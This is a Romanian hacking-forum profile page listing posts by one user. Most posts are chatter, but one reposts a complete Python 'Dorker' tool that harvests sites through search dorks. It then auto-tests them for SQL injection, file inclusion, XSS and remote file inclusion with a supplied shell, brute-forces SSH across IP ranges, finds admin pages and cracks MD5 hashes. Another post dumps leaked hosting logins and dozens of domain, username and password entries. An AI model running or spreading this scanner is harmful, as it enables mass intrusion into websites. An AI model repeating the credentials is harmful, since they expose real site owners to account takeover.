Jump to content

Gio33

Active Members
  • Posts

    656
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by Gio33

  1. Ba da tu stii sa faci ceva, domnule distrugator de PC-uri ? Iesiti in plm cu cacaturile astea de pe forum, auzi la el vrea sa dea scan si flood da nu stie nimic cu ce se mananca. @aelius
  2. Gio33

    Bunton in CSS

    Vezi pe aici: 40+ CSS Buttons from codepen Si pe aici: 40 CSS3 button examples with effects & animations
  3. Linkul avea un caracter aiurea in el, fiind copiat dupa chat (acesta schimba anumite caractere etc.. zatarra stie ce a facut pe acolo.. ) E ok acum.
  4. La indicatiile lui tex postez asta : https://www.linode.com/docs/contribute Get published by Linode, and get paid! Earn $100 per article, if it’s accepted for publication. We’re expanding the Linode Guides & Tutorials, and we want you to help! If you like writing, teaching people how to use Linux, and money, we want to hear from you. The guidelines are below. Topic List Submit your own topic, or choose from the list of open topics we want to add to the Linode Library: Nginx Tuning and Performance OpenChange WebRTC daemontools - Make sure you write about the tool at the link, as there are several products with similar names Each article is worth $100 if it is accepted for publication. In addition, we always welcome edits, suggestions, and updates to existing guides. Completed Topics These authors got their articles published and $100. You could be next. Varnish Cache - Kevin Cupp Pflogsumm - Robert Accettura SSH Tunnel with SOCKS Proxy - Arnaldo Ariel Arrieta Basic NFS Configuration on Debian 7 - Juan Traverso Configure Postfix to Send Mail Using an External SMTP Server - Santiago Ti MariaDB Setup on Debian 7 - Nashruddin Amin Running Apache with PHP-FPM on Debian and Ubuntu - Jesin A. Using WeeChat for Internet Relay Chat - Samuel Damashek Manage Git Repositories with GitLab on Ubuntu 14.04 (Trusty) - Nashruddin Amin Yesod, Nginx, and MySQL on Debian 7 (Wheezy)- Si-Qi Liu Installing iRedMail on your Linode - Nick Reichley Using StartSSL with the latest Nginx on Debian 7 - Ryan Laverdiere How Much Money Will I Earn? We will pay you $100 per article that is accepted for publication, in cash via PayPal, or as Linode credit. Note that submitting an article is not a guarantee of publication. After you submit it, we will let you know if your article has been accepted. Write Your Article Use the style guide. While you’re writing, make sure your content is: Accurate. Your instructions should be straightforward and technically accurate. Formatted. Your style should use PHP Markdown Extra formatting and match the Linode Library style guide. Original. Your content should be original material written for Linode. We will not accept submissions that have been copied from other sources. Want to make sure you don’t waste time writing a long article we can’t use? Submit a writing sample first, to contribute@linode.com. Submit Your Article Submit your article as a pull request on GitHub, or by emailing it to contribute@linode.com as a plain text or Markdown file attachment. Writing samples are welcome as well. Got images? Attach them as .png or .jpg files. If an image is over 650 pixels wide, please send both the original and a 650-pixel-wide version. Submission checklist: Article in .txt or .md format Images Your name, as you want it to appear in the Library PayPal account information, or Linode account information for Linode credit Once you’ve submitted your article, here’s what you can expect: You’ll receive a brief response acknowledging your submission. We will do a technical review of your material. This will take a few days. We will do a copy review of the article. This will take a few days. You may receive questions or comments from us, or a request for a resubmission with a few changes. We will let you know that your article has been chosen for publication and send you the final version we are planning to publish. You will have 36 hours to respond and approve our publication of the final version. If you respond positively (non-response will be taken as a go-ahead to publish), we will publish the article and give you the cash or Linode credit.
  5. Iei AutoIt Window Info si tragi 'Finder Tool'-ul ala pe ce buton/fereastra vrei, astfel o sa iti arate toate informatiile necesare despre el.
  6. @ cei care sunt in videoclip Respirati aerul degeaba Faceti umbra la pamant degeaba Consumati internetul degeaba Lasati-va de prostii, banii parintilor nu o sa fie forever si nici locurile de casier la Mega Image (oricat de multe magazine si-ar deschide ei).
  7. Nu e facut de mine. Nu incepeti cu intrebari cum se foloseste sau de ce da erori. Posibil sa fie probleme la indentari. #!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('oracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('system.data.oledb', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('SQL command net properly ended', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('atoracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('java.sql.sqlexception', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('query failed:', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('postgresql.util.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Error:unknown', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_numrows', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_num', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Invalid Query', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('FetchRow', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Syntax error', data, re.I)): self.mssql(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + W+url else: print O+"MySql: " + url + W write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print G+'Dupe: ' + url + W else: print O+"MsSql: " + url + W write = open (self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Lfi: " + url + W write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """<ScRIpT>alert('xssBYCranky');</ScRiPt>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYCranky", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Xss: " + url + W write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): self.rfi(link) vuln += 1 else: print B+link + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Rfi: " + url + W write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print O+'Found: ' + G+site + W class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onclick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + G+' vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\nprohexuh@gmail.com\n' ] print (O+''' ------------- -- Dorker -- --- v1.5 ---- ---- by ----- --- Cranky ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main() Pastebin: [Python] #!/usr/bin/env python import re import hashlib import Queue from random impo - Pastebin.com
  8. Am gasit din intamplare pe un pastebin un document cu multe accese, verificati si voi ce merge si ce sunt unele (nici eu nu m-am prins la unele ). Ele dateaza din 23 Apr 2014, deci posibil f multe sa nu mai mearga, worth trying totusi. Have fun PS: daca esti autorul acestui document, ar fi trebuit sa il pui privat, sorry PS2: bafta la metinari http://west-zone.ro/info.php http://gumptious.ro/?t-t ///////hostingspace.ro////// http://www.hostingspace.ro/?t-t ///////extreamhost.ro//////// extreamhost.com Username:root@extreamhost.com Pass:123123123a cc https://www.extreamhost.com/forum/delete.php?t-t http://4metin.ro/new/caracter.php?t-t http://4metin.ro/sitemap.php?t-t http://4metin.ro/adm/index.php?t-t http://4metin.ro/viewtopic.php?t-t 93.114.43.229 lauradmin dICborA8 gsppanel 1 93.114.44.44 contact@extreamhost.com wHiGs6tegs$ cpanel 1 93.114.44.38 root Xtre@m!x //////// domain User Pass IP's ramos.ro ramosro V8lJbYU1UT serviciiwww.ro servicii parolahost apartamente-noi.ro apart parolamea apartamente-noi.net apartame xtreme gdv.ro gdvro parolamea mri.com.ro mricomro mri mycdent.com mycdent manuelpass topbestfree.com topbestf wumqiYNHlE plangeficatul.ro plangefi 13KC90Pf3 dalv.ro dalvro 135dalv110 hva-technology.com hvatech hbghbg media-contact.ro mediac hbghbg creations.ro creation 1unu2doi gspprotection.ro gsp 19101910 profesionalgg.ro profesio pazaprotectie renteclass.ro rent eclass radupavel.com pavelave 10p1x0tmytmz8tx electotrade.ro electo electo123 gify-curatenie.ro gify .Cs.XVy9U?c1 business-job.ro business JsIud2FjK5 4m-concept.ro concept vqirfIseTH hostingspace.ro hostings parolahosting invisible-scanner.com invis 5PxIrzeabx webforge.ro webforge Ybnr4d8N2q avsuler.ro avsulerr i8Ttnt1AeR bitmec.ro bitmecro HFs4B2mcqP magicbride.ro magicbri pUeF5EgVOS salvationdata.ro salvatio romania22 mrcredit.ro mrcredit parolahosting csoltchim.com cursastronomie.ro cursastr q2Cn35R1h8 pizzalastrada.ro pizzalas 526P4udd3V taberesinaia.ro taberesi iLGDB94iaY giri-rs.ro girirsro tYVs3Dn2yp saptamanagiurgiuveana.ro saptaman zHKzQxOCWS ecigarette.ro ecigaret s651lwgB2G adrianmot.ro adrianmo 06llN3Ypw6 yellowcorporate.com yellowco cmT4V1xQwD apartamente-noi.tv apartam1 b0Emh2E1Cb idealcasainvest.ro idealcas vRDkk1HH7D lodoaba.com lodoabac 9rIMdFXuE3 parfumtm.ro parfumtm alphacentauri lucasdent.ro lucasden 0vBiAdKLt2 orasul-interzis.ro orasulin CZDklBbzlo servnet.service-calculatoare.net palaps.net agrimanagement.ro agrimana bFUc4VzQKT isofocsani.ro isofocsa WvWv2WiryL aliveevents.ro aliveeve 35Bikh5f3Y turn-into-color.com turninto et44yl4LT6 prescu.ro prescu tYpVxgt2cS artizart.ro artizart 1WARh7tizG myshowlist.com myshowli mftR68j8N4 iuliansasaran.ro iuliansa ianuionu91 blogfordating.com blogford 5DxjZk8mJE ionchivu.ro ionchivu wthF7vgxVD properspace.ro propersp properpass pieseautopaun.ro pieseaut 7E7iqc19yU dallclub.ro dallclub tZ7bd9n16Y midanweb.com midanweb bQxqU80p98 gabinicolae.com gabinico eWt54lyY52 avocat-tusinschi.ro avocattu avocat1 casino-sinaia.ro casinosi 